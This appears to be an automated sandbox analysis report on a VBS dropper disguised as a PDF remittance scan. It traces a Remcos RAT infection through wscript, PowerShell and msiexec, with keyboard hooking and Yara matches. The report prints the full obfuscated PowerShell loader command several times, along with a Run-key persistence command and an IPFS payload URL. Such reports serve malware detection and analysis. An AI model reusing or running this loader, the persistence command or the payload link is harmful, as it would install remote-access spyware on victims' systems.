            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz$
            Source: powershell.exe, 00000002.00000002.127616099079.0000027E9C1E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
            Source: msiexec.exe, 00000006.00000002.128753973581.000000000886C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560180223.000000000886C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.128761464292.0000000024390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ipfs.io/ipfs/bafybeif4qizmuos6tnbqhccf4cms273spugub5lbtgpc5zaaljfefoarzy/QMpkuY58.bin
            Source: powershell.exe, 00000002.00000002.127610468902.0000027E93A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownHTTPS traffic detected: 209.94.90.1:443 -> 192.168.11.20:49783 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_3592.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3592, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C4F9AD922_2_00007FF7C4F9AD92
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C4F9BB6E2_2_00007FF7C4F9BB6E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04517D304_2_04517D30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045186004_2_04518600
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045179E84_2_045179E8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_089506474_2_08950647
            Source: REMIT_SCAN_00008917738378282733(PDF).vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7112
            Source: unknownProcess created: Commandline size = 7112
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7112Jump to behavior
            Source: amsi32_3592.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/8@2/3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Leveringstiden.ReqJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:460:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:460:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\moutgporsnmx-4IKOBJ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:304:WilStaging_02
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc0kctms.qpc.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6212
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3592
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
